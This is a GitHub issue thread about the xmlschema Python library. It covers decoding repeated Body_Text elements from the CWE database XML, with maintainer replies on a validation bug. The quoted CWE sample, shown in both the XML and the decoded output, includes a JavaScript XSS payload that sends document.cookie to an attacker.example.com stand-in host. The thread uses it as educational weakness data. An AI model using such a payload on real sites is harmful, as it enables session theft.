Separating Content of Multiple Elements with the Same Name #334

Closed
TrustArgon opened this issue Jan 4, 2023 · 3 comments

TrustArgon commented Jan 4, 2023

When processing an XML document, xmlschema concatenates the contents of multiple elements with the same name into a single dictionary value keyed by the element's name. Is there a way to force unique keys when multiple elements of the same name are present, so that the result is a list of dictionaries or a dictionary containing a unique key:value pair for each instance?

The example I'm working with is the xml of the CWE Database found at: CWE Database XML ZIP File

The schema can be found at: CWE Database XSD File

Below is the section of the XSD I'm working with; the element in question is named 'Body_Text':

<xs:complexType name="DemonstrativeExamplesType">
		<xs:annotation>
			<xs:documentation>The DemonstrativeExamplesType complex type contains one or more Demonstrative_Example elements, each of which contains an example illustrating how a weakness may look in actual code. The optional Title_Text element provides a title for the example. The Intro_Text element describes the context and setting in which this code should be viewed, summarizing what the code is attempting to do. The Body_Text and Example_Code elements are a mixture of code and explanatory text about the example. The References element provides additional information.</xs:documentation>
			<xs:documentation>The optional Demonstrative_Example_ID attribute is used by the internal CWE team to uniquely identify examples that are repeated across any number of individual weaknesses. To help make sure that the details of these common examples stay synchronized, the Demonstrative_Example_ID is used to quickly identify those examples across CWE that should be identical. The identifier is a string and should match the following format: DX-1.</xs:documentation>
		</xs:annotation>
		<xs:sequence>
			<xs:element name="Demonstrative_Example" minOccurs="1" maxOccurs="unbounded">
				<xs:complexType>
					<xs:sequence>
						<xs:element name="Title_Text" type="xs:string" minOccurs="0" maxOccurs="1"/>
						<xs:element name="Intro_Text" type="cwe:StructuredTextType" minOccurs="1" maxOccurs="1"/>
						<xs:choice minOccurs="0" maxOccurs="unbounded">
							<xs:element name="Body_Text" type="cwe:StructuredTextType"/>
							<xs:element name="Example_Code" type="cwe:StructuredCodeType"/>
						</xs:choice>
						<xs:element name="References" type="cwe:ReferencesType" minOccurs="0" maxOccurs="1"/>
					</xs:sequence>
					<xs:attribute name="Demonstrative_Example_ID" type="xs:string"/>
				</xs:complexType>
			</xs:element>
		</xs:sequence>
	</xs:complexType>

A sample of the XML that prompts my question is as follows:

<Demonstrative_Examples>
            <Demonstrative_Example>
               <Intro_Text>In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.</Intro_Text>
               <Body_Text>The snippet of code below establishes a new cookie to hold the sessionID.</Body_Text>
               <Example_Code Nature="Bad" Language="Java">
                  <xhtml:div>String sessionID = generateSessionId();<xhtml:br/>Cookie c = new Cookie("session_id", sessionID);<xhtml:br/>response.addCookie(c);</xhtml:div>
               </Example_Code>
               <Body_Text>The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:</Body_Text>
               <Example_Code Nature="Attack" Language="JavaScript">
                  <xhtml:div>document.write('&lt;img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '"&gt;'</xhtml:div>
               </Example_Code>
               <Body_Text>When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.</Body_Text>
               <Body_Text>To mitigate the risk, use the setHttpOnly(true) method.</Body_Text>
               <Example_Code Nature="Good" Language="Java">
                  <xhtml:div>String sessionID = generateSessionId();<xhtml:br/>Cookie c = new Cookie("session_id", sessionID);<xhtml:br/>c.setHttpOnly(true);<xhtml:br/>response.addCookie(c);</xhtml:div>
               </Example_Code>
            </Demonstrative_Example>
         </Demonstrative_Examples>

The following shows the relevant part of the generated object:

 'Demonstrative_Examples': {
     'Demonstrative_Example': [{
         'Body_Text': [
             'The snippet of code below establishes a new cookie to hold the sessionID.',
             'The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:',
             'When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.',
             'To mitigate the risk, use the setHttpOnly(true) method.'],
         'Example_Code': [
             {'$': 'String sessionID = generateSessionId();Cookie c = new Cookie("session_id", sessionID);response.addCookie(c);',
              '@Language': 'Java',
              '@Nature': 'Bad'},
             {'$': 'document.write(\'<img src="http://attacker.example.com/collect-cookies?cookie=\' + document.cookie . \'">\'',
              '@Language': 'JavaScript',
              '@Nature': 'Attack'},
             {'$': 'String sessionID = generateSessionId();Cookie c = new Cookie("session_id", sessionID);c.setHttpOnly(true);response.addCookie(c);',
              '@Language': 'Java',
              '@Nature': 'Good'}],
         'Intro_Text': "In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client."}]},

Any help would be greatly appreciated.

Member

brunato commented Feb 6, 2023

Hi,
sorry for the late response, but I was busy closing other things.

Having analyzed the schema, the related data is bound to a complex type with mixed content, and this is the reason for the (maybe unwanted) string concatenation. Before that, I also have to resolve a validation issue with the cwec_v4.10.xml data:

>>> import xmlschema
>>> xs = xmlschema.XMLSchema11('cwe_schema_latest.xsd')
>>> xs.validate('cwec_v4.10.xml')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/brunato/Development/projects/xmlschema/xmlschema/validators/schemas.py", line 1703, in validate
    raise error
xmlschema.validators.exceptions.XMLSchemaValidationError: failed validating <Element '{http://cwe.mitre.org/cwe-6}Note' at 0x7fa90c4bcb80> with Xsd11Group(model='sequence', occurs=[1, 1]):

Reason: character data between child elements not allowed

Schema:

  <xs:complexType xmlns:xs="http://www.w3.org/2001/XMLSchema">
      <xs:complexContent>
          <xs:extension base="cwe:StructuredTextType">
              <xs:attribute name="Type" type="cwe:NoteTypeEnumeration" use="required" />
          </xs:extension>
      </xs:complexContent>
  </xs:complexType>

Instance:

  <Note xmlns="http://cwe.mitre.org/cwe-6" Type="Relationship">This could introduce other weaknesses related to missing input validation.</Note>

Path: /Weakness_Catalog/Weaknesses/Weakness[9]/Notes/Note[1]

I hope to produce a fix for the next release.

Thank you
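
To illustrate the mixed-content point made above, here is a minimal sketch using only the standard library's `xml.etree.ElementTree`, not xmlschema itself. It parses the first `Example_Code` element quoted in this issue and shows that the character data is split around the `xhtml:br` children, so flattening it yields the single concatenated string seen under `'$'` in the decoded output. The XHTML namespace URI is an assumption, since the issue does not show the `xmlns:xhtml` declaration.

```python
import xml.etree.ElementTree as ET

# Assumed namespace URI for the xhtml prefix (not shown in the issue).
XHTML = "http://www.w3.org/1999/xhtml"

# Fragment adapted from the first Example_Code element quoted in this issue.
fragment = (
    f'<Example_Code xmlns:xhtml="{XHTML}" Nature="Bad" Language="Java">'
    '<xhtml:div>String sessionID = generateSessionId();<xhtml:br/>'
    'Cookie c = new Cookie("session_id", sessionID);<xhtml:br/>'
    'response.addCookie(c);</xhtml:div>'
    '</Example_Code>'
)

root = ET.fromstring(fragment)
div = root.find(f"{{{XHTML}}}div")

# In mixed content, character data is split around the child elements:
# the first run is div.text, later runs are the .tail of each <xhtml:br/>.
pieces = [div.text] + [br.tail for br in div]

# Joining every text node gives one string with no separator between runs.
flattened = "".join(root.itertext())

print(pieces)
print(flattened)
```

The `pieces` list keeps the three code lines apart, while `flattened` runs them together, which matches the `generateSessionId();Cookie c = ...` value reported in the question.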

Member

brunato commented Feb 9, 2023

Hi @TrustArgon,

I found the problem behind the validation issue with the cwec_v4.10.xml data. Independently of the fix, I tried decoding after building a full sample schema and instance (issue_334.zip), and the decoding now seems correct (I used xmlschema==2.2.0 and elementpath==4.0.1):

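# Snippet taken from a test case: self.schema_class is the schema class under test.
# Outside a test, a class such as xmlschema.XMLSchema11 (used in the earlier comment) could stand in for it.
xs = self.schema_class(xsd_file)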
result = xs.decode(xml_file)
body_text = result['Demonstrative_Example'][0]['Body_Text']
print(body_text)
# ['The snippet of code below establishes a new cookie to hold the sessionID.', 'The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:', 'When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.', 'To mitigate the risk, use the setHttpOnly(true) method.']

Could you try my test files with the same environment?

Thank you
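
If the relative order of `Body_Text` and `Example_Code` matters, one possible workaround is to walk the children directly and build a list with one dictionary per element, as the original question asked. The sketch below is an assumption-laden illustration that uses only the standard library's `xml.etree.ElementTree` and does no schema validation; it is not xmlschema's API. The `sample` document is a shortened stand-in for the quoted XML, and `ordered_children` is a hypothetical helper name.

```python
import xml.etree.ElementTree as ET

# Shortened stand-in for the Demonstrative_Example quoted in this issue;
# namespaces and the xhtml markup are left out to keep the sketch small.
sample = """
<Demonstrative_Example>
  <Intro_Text>A cookie stores the session ID.</Intro_Text>
  <Body_Text>The snippet below creates the cookie.</Body_Text>
  <Example_Code Nature="Bad" Language="Java">response.addCookie(c);</Example_Code>
  <Body_Text>To mitigate the risk, use the setHttpOnly(true) method.</Body_Text>
  <Example_Code Nature="Good" Language="Java">c.setHttpOnly(true);</Example_Code>
</Demonstrative_Example>
"""


def ordered_children(element):
    """Return one dict per child element, in document order (hypothetical helper)."""
    items = []
    for child in element:
        # Flatten any nested markup into a single text value for this child.
        item = {"tag": child.tag, "text": "".join(child.itertext()).strip()}
        # Prefix attributes with '@', mirroring the decoded output shown earlier.
        item.update({f"@{name}": value for name, value in child.attrib.items()})
        items.append(item)
    return items


example = ET.fromstring(sample)
for entry in ordered_children(example):
    print(entry)
```

Each instance stays a separate entry and the interleaving of text and code is preserved, at the cost of losing the typed decoding that xmlschema provides.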

Member

brunato commented Mar 5, 2023

I assume this issue is resolved; otherwise, please re-open it.
